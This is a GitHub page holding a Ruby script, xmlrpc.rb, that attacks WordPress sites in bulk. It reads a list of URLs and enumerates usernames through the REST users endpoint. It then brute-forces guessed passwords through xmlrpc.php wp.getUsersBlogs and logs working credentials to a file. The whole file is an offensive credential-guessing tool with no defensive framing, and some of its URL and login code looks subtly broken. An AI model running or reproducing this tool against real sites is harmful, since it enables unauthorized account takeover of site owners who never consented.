-
Notifications
You must be signed in to change notification settings - Fork 0
/
xmlrpc.rb
199 lines (166 loc) · 5.46 KB
/
xmlrpc.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
require 'net/http'
require 'uri'
require 'optparse'
require 'eventmachine'
require 'json'
class XMLRPC_WP
def initialize
@headers = {
'Connection' => 'keep-alive',
'User-Agent' => 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'referer' => 'www.google.com'
}
@params = {
input_file: nil,
output_file: 'output.txt'
}
@threads = []
end
def exploit(url_exploit)
begin
url = URI.parse(url_exploit)
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = (url.scheme == "https")
request = Net::HTTP::Get.new("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users", @headers)
response_exploit = http.request(request)
if response_exploit.body.include?('gravatar.com')
usernames = JSON.parse(response_exploit.body).map { |user| user['name'] }
if usernames.any?
usernames.each do |username|
pass = [
username + username, username, username + '123', username + '1234', "admin", "root", "password", "pass"
]
pass.each do |password|
xmlrpc_payload = <<-XMLRPC
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>#{username}</value></param>
<param><value>#{password}</value></param>
</params>
</methodCall>
XMLRPC
begin
request = Net::HTTP::Post.new("#{url.scheme}:https://#{url.host}/xmlrpc.php", @headers)
request.body = xmlrpc_payload
post_load = http.request(request)
if post_load.body.include?('blogName')
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Users Found".green)
log_checker(url_exploit, username, password)
else
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: (blogName Not Found)".red)
return
end
rescue StandardError => err
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
rescue Net::OpenTimeout, Net::ReadTimeout => err
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
end
end
end
else
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln (Username Not Found)".red)
end
else
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln (Gravatar Not Found)".red)
return
end
rescue StandardError => err
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
rescue Net::OpenTimeout, Net::ReadTimeout => err
puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
end
end
def log_checker(url_check, user, password)
url = URI.parse(url_check)
url.path = "/xmlrpc.php"
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = (url.scheme == "https")
request = Net::HTTP::Post.new(url.path)
request.set_form_data(
'log' => user,
'pwd' => password,
'wp-submit' => 'Log In',
)
request['Cookie'] = 'testcookie=1'
response = http.request(request)
if response.code == '302'
if response['location'].include?('admin')
File.open(@params[:output_file], "a+") do |file|
file.puts("#{url.scheme}:https://#{url.host}/wp-login.php##{user}@#{password}")
end
end
else
puts("#{url.scheme}:https://#{url.host}/xmlrpc.php --> Not Vuln".red)
end
end
def print_help
help_text = <<-'HELP_TEXT'
USAGE: ruby exploit.rb [options]
OPTIONS:
-i, --input_file INPUT_FILE: Define the path to the URL file.
-o, --output_file OUTPUT_FILE: Define the name of the output log file.
HELP_TEXT
puts(help_text.magenta)
end
def parse_lines(lines)
lines.each do |line|
exploit(line.strip)
end
end
def parser_options
begin
OptionParser.new do |parser|
parser.on("-i", "--input_file INPUT_FILE") do |input_file|
if File.exist?(input_file)
@params[:input_file] = input_file
else
STDERR.puts("Not Found: #{input_file}".red)
exit(1)
end
end
parser.on("-o", "--output_file OUTPUT_FILE") do |output_file|
@params[:output_file] = output_file
end
end.parse!
rescue Exception => err_parser
STDERR.puts("Error: #{err_parser}")
end
end
def main
begin
unless @params[:input_file].nil?
lines = File.readlines(@params[:input_file])
lines.each_slice(20) do |line_group|
@threads << Thread.new{parse_lines(line_group)}
end
@threads.each(&:join)
puts("Exploit Completed".magenta)
EM.stop
else
print_help
EM.stop
end
rescue StandardError
return
EM.stop
end
end
end
class String
def red
"\e[31m#{self}\e[0m"
end
def green
"\e[32m#{self}\e[0m"
end
def magenta
"\e[35m#{self}\e[0m"
end
end
EM.run do
xmlrpc = XMLRPC_WP.new
xmlrpc.parser_options
xmlrpc.main
end